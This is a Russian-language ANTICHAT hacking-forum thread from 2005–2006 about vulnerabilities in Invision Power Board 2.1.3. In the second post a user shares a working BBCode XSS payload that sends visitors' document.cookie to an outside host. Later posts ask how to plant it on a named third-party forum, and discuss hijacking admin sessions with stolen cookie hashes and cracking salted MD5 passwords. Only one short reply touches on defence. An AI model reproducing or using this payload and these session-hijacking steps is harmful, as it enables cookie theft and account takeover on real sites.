HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос про уязвимости в IPB v2.1.3
  #1  
Старый 28.12.2005, 19:26
Destroyer
Новичок
Регистрация: 17.12.2005
Сообщений: 18
С нами: 10734986

Репутация: 2
По умолчанию Вопрос про уязвимости в IPB v2.1.3

Не подскажите какие уязвимости присутствуют в Invision Power Board (Free Trial) v2.1.3 © 2005 а то ни где не нашёл!
 
Ответить с цитированием

  #2  
Старый 28.12.2005, 21:12
1251soldier
Познающий
Регистрация: 13.10.2005
Сообщений: 78
С нами: 10828602

Репутация: 30
По умолчанию

Код HTML:
[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Ploho ishesh
 
Ответить с цитированием

  #3  
Старый 03.01.2006, 16:17
muse
Новичок
Регистрация: 25.09.2005
Сообщений: 29
С нами: 10854458

Репутация: 9
По умолчанию

Цитата:
Сообщение от 1251soldier  
Код HTML:
[email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Ploho ishesh
narod objasnite plizz soderjimoe etogo koda
wj@wj - leviy email
http://www.wj.com - leviy url a za4em tam `=`?
nu dalwe vrode vse ponatno...
pasipa
 
Ответить с цитированием

  #4  
Старый 03.01.2006, 17:14
maXaTTAck
Новичок
Регистрация: 06.09.2005
Сообщений: 9
С нами: 10883057

Репутация: 0
По умолчанию

Эти адреса не важны вообще: можешь поставить вместо их что-угодно.
 
Ответить с цитированием

  #5  
Старый 05.01.2006, 18:03
Kragen
Новичок
Регистрация: 03.01.2006
Сообщений: 17
С нами: 10710738

Репутация: 0
По умолчанию

Цитата:
Сообщение от muse  
narod objasnite plizz soderjimoe etogo koda
wj@wj - leviy email
http://www.wj.com - leviy url a za4em tam `=`?
nu dalwe vrode vse ponatno...
pasipa
Вот например мне нужно поместить этот код на форум:
http://forum.la2world.ru/index.php?showtopic=3208&st=40

Что должно быть написано в коде?

Замест wj@wj, мой е-майл, а замест етого:
http://www.wj.com`=`].com
что должно быть?
 
Ответить с цитированием

  #6  
Старый 28.12.2005, 21:22
Destroyer
Новичок
Регистрация: 17.12.2005
Сообщений: 18
С нами: 10734986

Репутация: 2
По умолчанию

Спасибо попробую
 
Ответить с цитированием

  #7  
Старый 31.12.2005, 18:54
Diablo
Участник форума
Регистрация: 07.11.2005
Сообщений: 166
С нами: 10793126

Репутация: 111
По умолчанию

А как от этого защитится ?
 
Ответить с цитированием

  #8  
Старый 02.01.2006, 00:14
Barsik
Постоянный
Регистрация: 16.01.2005
Сообщений: 300
С нами: 11217926

Репутация: 726
По умолчанию

Цитата:
Сообщение от Diablo  
А как от этого защитится ?
Вроде выключить bb код
 
Ответить с цитированием

  #9  
Старый 01.01.2006, 17:36
Arthas
Новичок
Регистрация: 30.07.2005
Сообщений: 12
С нами: 10936772

Репутация: 1
По умолчанию

ребята, вставляю хеш и ид админа в куки (речь идет о ипб 2.1.3) но всё ровно не могу зайти под админом, хотя в ипб 1.3 всё отлично работает. в чём дело не подскажете?
 
Ответить с цитированием

  #10  
Старый 01.01.2006, 21:26
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
С нами: 10761096

Репутация: 27
По умолчанию

Потому что в 2.х в админке еще раз проверяеться пасс...
тебе надо пасс админа а не кго куки.
а так как это 2.х ты не разшифруеш мд5 без соли...
разшифровывай и заходи в админку
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Уязвимости в Invision Power Board(U) v1.3 PF1. Вопрос. dukalis(AwP) Уязвимости CMS / форумов 14 19.04.2006 19:40
Вопрос про уязвимости в ExBB 1.9 cardons Уязвимости CMS / форумов 10 30.01.2006 23:57
Вопрос про уязвимости в FastBB deo Уязвимости CMS / форумов 9 29.11.2004 09:47
Вопрос про уязвимости в exbb Уязвимости CMS / форумов 1 02.08.2004 19:17



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.